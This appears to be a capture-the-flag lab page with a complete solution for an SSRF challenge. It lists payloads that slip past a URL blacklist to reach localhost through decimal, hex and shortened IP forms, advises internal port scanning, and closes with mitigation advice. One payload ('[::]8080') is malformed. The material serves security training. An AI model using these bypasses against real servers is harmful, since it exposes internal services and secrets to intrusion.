Avatar

Labs / SSRF Validator

  • Challenge
  • Released 02 Oct 2025

🌐 Can you trick the server into revealing its own secrets?

A seemingly secure URL validation service stands between you and sensitive internal data! 🔒 The server thinks it's safe behind its firewall, but clever request manipulation might just convince it to fetch data from places it shouldn't. 🕵️ Master the art of server-side request forgery and turn the server against itself! 💥

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

🌐 SSRF Validator - Complete Solution

Objective: Exploit the URL validation service to access internal endpoints and retrieve the flag from the server's internal API.
🔍 Step 1: Understanding the Application

The challenge presents a URL validation service that fetches and displays content from provided URLs. The service has basic protections against accessing localhost and internal IP ranges.

Initial Analysis:
• Service accepts URLs via POST to /validate
• Displays fetched content in response
• Has blacklist filters for localhost/127.0.0.1
• Blocks common internal IP ranges (192.168.x.x, 10.x.x.x)
🔍 Step 2: SSRF Bypass Techniques

Several methods can bypass the URL validation filters:

Method 1: Alternative Localhost Representations
http://0.0.0.0:8080/flag
http://0:8080/flag
http://[::]8080/flag

Method 2: Decimal/Hex IP Encoding
http://2130706433:8080/flag (127.0.0.1 in decimal)
http://0x7f000001:8080/flag (127.0.0.1 in hex)

Method 3: URL Encoding
http://127.0.0.1:8080/flag with URL encoding
• Double encoding techniques
🔍 Step 3: Discovering Internal Services

The internal service runs on port 8080 and has a /flag endpoint that contains sensitive information:

Internal Service Discovery: Use SSRF to scan common internal ports (8080, 3000, 5000, 9000) and endpoints (/flag, /admin, /api, /internal) to locate the flag.
🔍 Step 4: Successful Exploitation

Submit the bypass payload to the validation service:

Exploitation Process:
1. Navigate to the URL validation form
2. Enter bypass payload: http://0.0.0.0:8080/flag
3. Submit the form via POST request
4. The server fetches content from internal endpoint
5. Flag is displayed in the response
🔍 Step 5: Alternative Methods

Multiple SSRF techniques work for this challenge:

Working Payloads:
http://0:8080/flag
http://2130706433:8080/flag
http://localhost:8080/flag (if filter bypass works)
http://127.1:8080/flag
📚 Learning Points
  • SSRF Fundamentals: Understanding server-side request forgery mechanics
  • Filter Bypass: Various techniques to circumvent URL validation
  • Internal Reconnaissance: Using SSRF for internal network discovery
  • Security Impact: How SSRF can expose internal services and data
Mitigation: Proper SSRF prevention includes whitelist-based URL validation, network segmentation, and avoiding user-controlled URLs in server requests.